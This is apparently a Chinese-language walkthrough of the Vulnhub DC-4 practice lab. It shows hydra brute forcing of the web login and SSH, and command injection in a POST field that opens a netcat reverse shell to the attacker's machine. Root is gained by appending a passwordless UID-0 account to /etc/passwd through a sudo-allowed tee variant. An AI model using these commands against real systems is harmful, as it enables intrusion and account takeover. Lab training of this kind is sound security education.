Vulnhub DC-4 WriteUp

admin
admin
admin
102354
文章
87
评论
2021年5月23日12:07:08评论173 views字数 2195阅读7分19秒阅读模式
Vulnhub DC-4 WriteUp


  • 前言

  • 攻击过程

    • 信息收集

    • 开始攻击

    • 权限提升

  • Ending......


前言

  • 靶场链接:https://www.vulnhub.com/entry/dc-4,313/

DC-4 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

Unlike the previous DC releases, this one is designed primarily for beginners/intermediates. There is only one flag, but technically, multiple entry points and just like last time, no clues.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

攻击过程

信息收集

首先使用 arp-scan 扫描内网存活主机:

arp-scan --interface=eth0 192.168.226.0/24
Vulnhub DC-4 WriteUp
image-20210508142200804

发现主机 192.168.226.130,使用nmap进一步探测其端口情况:

nmap -sC -sV -p- -sT 192.168.226.130
Vulnhub DC-4 WriteUp
image-20210508142311373

开启了 22、80 和 111 三个端口。先访问 80 端口,是一个 Admin 登录系统:

Vulnhub DC-4 WriteUp
image-20210508142402080

测试了 sql 注入没啥用,由于没有验证码,所以我们考虑爆破。

开始攻击

我们使用 hydra 工具外加 kali 自带的字典进行登录爆破:

hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.226.130 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -F
Vulnhub DC-4 WriteUp
image-20210508142529841

如上图所示,成功爆破得到 admin 的密码为 happy。

登录后发现有三个选项可以执行不同的命令:

Vulnhub DC-4 WriteUp
image-20210508142636526

我们抓包即可实现任意命令执行:

Vulnhub DC-4 WriteUp
image-20210508142741788

然后使用 nc 反弹个 Shell:

radio=nc 192.168.226.128 2333 -e /bin/bash&submit=Run
Vulnhub DC-4 WriteUp
image-20210508142933256

成功。

然后再 /home 中发现了三个用户 charles、jim、sam 的主目录,并在 jim 中发现了一个 oldpasswords.bak 文件:

Vulnhub DC-4 WriteUp
image-20210508143156342

我们获取该文件并使用里面的密码对 jim 用户进行 ssh 登录爆破:

hydra -l jim -P old-passwords.txt -t 6 ssh://192.168.226.130
Vulnhub DC-4 WriteUp
image-20210508144446123

爆破成功,使用 jim 用户登录 ssh:

Vulnhub DC-4 WriteUp
image-20210508144548564

如上图所示,提示我有新邮件。我们在 jim 用户主目录发现一个邮件:

Vulnhub DC-4 WriteUp
image-20210508144830206

去 /var/mail 里面查看邮件日志:

Vulnhub DC-4 WriteUp
image-20210508145112758

发现 Charles 用户的密码,成功切换到 Charles 用户:

Vulnhub DC-4 WriteUp
image-20210508145413574

权限提升

首先考虑 Suid 提权,但是没找的可以利用的命令:

Vulnhub DC-4 WriteUp
image-20210508145542332

再考虑 sudo:

Vulnhub DC-4 WriteUp
image-20210508145659573

发现该用户可以不需要输入密码即可以 root 权限执行 teehee 命令,这个 teehee 命令应该类似于 tee,用于读取标准输入的数据,并将其内容输出成文件。

那我们的思路就来了,由于 teehee 命令可以写入文件内容并不覆盖文件原有内容,并且可以以 root 权限运行,那我们可以将一个无密码的用户 admin 写入到 /etc/passwd 文件中,并加入到 root 组中:

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Vulnhub DC-4 WriteUp
image-20210508151645956

然后直接切换到 admin 用户就是 root 权限了:

Vulnhub DC-4 WriteUp
image-20210508151726986

最终在 /root 里面发现并读取到了 flag:

Vulnhub DC-4 WriteUp
image-20210508151806299

Ending......

本文始发于微信公众号(山警网络空间安全与电子数据取证):Vulnhub DC-4 WriteUp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月23日12:07:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub DC-4 WriteUphttp://cn-sec.com/archives/379433.html

发表评论

匿名网友 填写信息